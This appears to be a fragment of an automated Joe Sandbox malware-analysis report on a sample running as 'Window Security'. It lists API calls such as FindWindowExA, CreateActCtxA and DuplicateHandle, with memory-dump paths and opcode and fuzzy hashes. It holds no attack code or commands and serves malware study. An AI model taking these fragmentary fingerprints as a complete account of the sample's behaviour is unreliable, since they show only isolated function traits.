                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: dc9e408e9e97c5128f55ea11ca6bf03d9ee60d84afe9fdb05afd17da52939fa3
                                                    • Instruction ID: 4102e19464873625ae14b64ea3d84946c3aa3a35047a79b016a5df695342752e
                                                    • Opcode Fuzzy Hash: dc9e408e9e97c5128f55ea11ca6bf03d9ee60d84afe9fdb05afd17da52939fa3
                                                    • Instruction Fuzzy Hash: F85186B09013498FDB14EFA9D548BEEBFF1FF4A304F20C499D109A72A1DA789845CB65

                                                    Control-flow Graph

                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 0258C24D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID: W
                                                    • API String ID: 134000473-655174618
                                                    • Opcode ID: 153425cfced16b0e93e9bc5ed37edc8a9a9c184aa3b774ec6d66a48a54b5ee09
                                                    • Instruction ID: 00b76fd0523e46fc9a4adc60445bca978943897dddac12b7b312b05b3784fec6
                                                    • Opcode Fuzzy Hash: 153425cfced16b0e93e9bc5ed37edc8a9a9c184aa3b774ec6d66a48a54b5ee09
                                                    • Instruction Fuzzy Hash: E9514971E006098FDB14EFA9C9807ADBBF2FF48705F10852AD85AB7284DBB49845CF95

                                                    Control-flow Graph

                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 0258C24D
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 111a1017cfb02f2ebbc39d947c9f7c9f3706cad7c80327ef2267eae7c6d03a1c
                                                    • Instruction ID: 418a4fa282d8cbd7a34e42e86d5733dae27171ebec899e86b5c18abe3058e275
                                                    • Opcode Fuzzy Hash: 111a1017cfb02f2ebbc39d947c9f7c9f3706cad7c80327ef2267eae7c6d03a1c
                                                    • Instruction Fuzzy Hash: 7E516771E002099FDB14EFE9C9817AEBBF1FB48700F10812AE856BB284D7B49841CF95

                                                    Control-flow Graph

                                                    • Graph for the function at 258bbc4-258bd78 (calls FindWindowA); the node/edge dump and the executed/not-executed colouring of the rendered graph are omitted
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 9b26de32696b4fed544588342df466118b17fcffb8fd2f0db170afa619b50020
                                                    • Instruction ID: 39f36853bed7cb965d25a77ffa4b35749c483aadbd406d306ba547a07cd83386
                                                    • Opcode Fuzzy Hash: 9b26de32696b4fed544588342df466118b17fcffb8fd2f0db170afa619b50020
                                                    • Instruction Fuzzy Hash: A35168B0D006599FDB10EFA8C88479EBBF5FB48318F148129E815FB294DBB49842CF85

                                                    Control-flow Graph

                                                    • Graph for the function at 258bbd0-258bd78 (calls FindWindowA); the node/edge dump and the executed/not-executed colouring of the rendered graph are omitted
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 40fff7cbd0cea72eef9c32b8e667e02672d93005244c052598f134b3c544a65b
                                                    • Instruction ID: 2ccb92403ef6ca2f7af87537d8ec7c362f0d2520a8a517e2544e67acc283cf87
                                                    • Opcode Fuzzy Hash: 40fff7cbd0cea72eef9c32b8e667e02672d93005244c052598f134b3c544a65b
                                                    • Instruction Fuzzy Hash: 715177B0D006099FDB10EFA9C88579EBBF5FB48318F108129E815FB244DBB49882CF85

                                                    Control-flow Graph

                                                    • Graph for the function at 2583347-2583499 (calls CreateActCtxA); the node/edge dump and the executed/not-executed colouring of the rendered graph are omitted
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02583401
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: ea8befba9acf7e66e0ca73c1d404024617578f0eb644731580d353167d9c88a8
                                                    • Instruction ID: 654dfdaa9ee6b26661cdb8e272c7887d3aa4c7d1a64a6e34b83f8dec5aa53346
                                                    • Opcode Fuzzy Hash: ea8befba9acf7e66e0ca73c1d404024617578f0eb644731580d353167d9c88a8
                                                    • Instruction Fuzzy Hash: FA4104B0C00319DADB25DFA9C848B9DBBB5BF44704F2080AAD409BB261DBB55946CF94

                                                    Control-flow Graph

                                                    • Graph for the function at 2581980-2583499 (calls CreateActCtxA); the node/edge dump and the executed/not-executed colouring of the rendered graph are omitted
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02583401
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 306b5546db7de96a3a5f0838739447962be33ed6c4089178b09547fba0f04f4f
                                                    • Instruction ID: abcfcb8f255e8575742c3e5cce3d5cefd84fef1ca0a931b0e79fa413e2ca85fc
                                                    • Opcode Fuzzy Hash: 306b5546db7de96a3a5f0838739447962be33ed6c4089178b09547fba0f04f4f
                                                    • Instruction Fuzzy Hash: 1A4104B0C00719CBDB24DFA9C84878DBBB5BF44704F20806AD409BB251DBB56946CF94
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0258DCC7
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 80f1237a322b16746797560123314c50962a7700970d49bc7eccafb30dfaa684
                                                    • Instruction ID: c171a6fdb077961eed83bae6284a6e46ee9a59f2caf6ebe8247b37164853e53a
                                                    • Opcode Fuzzy Hash: 80f1237a322b16746797560123314c50962a7700970d49bc7eccafb30dfaa684
                                                    • Instruction Fuzzy Hash: 5821E7B59002089FDB10CF9AD984ADEFFF5FB48314F14841AE914A3350D378A944CFA4
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0258DCC7
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 432dea6f0827715631efa8ef7eea86101e165fb81c03636d46dcb08c84e50eb5
                                                    • Instruction ID: 70fe4c013e3d3b043ffceb4ee7575cf9e602468e05d3daab076274d5a8014141
                                                    • Opcode Fuzzy Hash: 432dea6f0827715631efa8ef7eea86101e165fb81c03636d46dcb08c84e50eb5
                                                    • Instruction Fuzzy Hash: 6E21E4B59002089FDB10CFAAD984ADEBFF9FB48310F14841AE918A3350C378A944CFA4
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0258E6BD
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 24501835718e7053bb27fb846ef273b368bc980826a2ce60c2e7885fdb205d53
                                                    • Instruction ID: 6169851c818a48265dfb321d2deb3b1ba39016cf7196b51ab2df381e91c5b4b5
                                                    • Opcode Fuzzy Hash: 24501835718e7053bb27fb846ef273b368bc980826a2ce60c2e7885fdb205d53
                                                    • Instruction Fuzzy Hash: 3D1103B19003488FDB20EF9AD545B9EBBF8EB49310F108459E519A7310D379A944CFA5
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0258E6BD
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: bf145a22c92bcfcb56633203e16610c5731f8971d791a7bb5156636fbe3a9479
                                                    • Instruction ID: d9fb94866c6746b16c8c2c55ddd8f8ad13948625147e5031667257e562759608
                                                    • Opcode Fuzzy Hash: bf145a22c92bcfcb56633203e16610c5731f8971d791a7bb5156636fbe3a9479
                                                    • Instruction Fuzzy Hash: 511100B59003098FDB20DF9AD5497DEBBF4AB48320F20845AD558B3710D379A544CFA4
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d93b949416551d3152677e38c793a9463cd84863cf0ec8a9e6bcb71079c2ddc
                                                    • Instruction ID: 5e04efd74aec501ae17200ffd2e52d1e20428f4a3ac0c52aa81da9ac62003d23
                                                    • Opcode Fuzzy Hash: 1d93b949416551d3152677e38c793a9463cd84863cf0ec8a9e6bcb71079c2ddc
                                                    • Instruction Fuzzy Hash: 26212572500208EFCB05DF94E9C0F26BF65FB98320F20C569E9090B296C33BE856D7A1
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b402bebadddd6491a5480819840716a8165d4151ddd7643b39f8cf89d98c74c8
                                                    • Instruction ID: 377a681b20599edfb834c033a3e03a8708e5f952e1cf889a791c5ac3f1655fba
                                                    • Opcode Fuzzy Hash: b402bebadddd6491a5480819840716a8165d4151ddd7643b39f8cf89d98c74c8
                                                    • Instruction Fuzzy Hash: 6A210A72504208DFDB05DF94EDC0F26BF65FB98318F248569ED090B296C33AE856D7A2
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 5950507e447e0919292c146230c7fef17e978221a0813061a780b420601d04b5
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 64110372404244DFCB02CF40D9C4B16BF72FB94320F24C5A9D9090B656C33AE85ACBA2
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 61e5df305d027ec7e99851c9aadda3f83a86dbb249ff4916e0d424f8c05f15ae
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 6111E676504244CFCB16CF54E9C4B16BF71FB98324F24C6A9DD090B256C33AE85ACBA2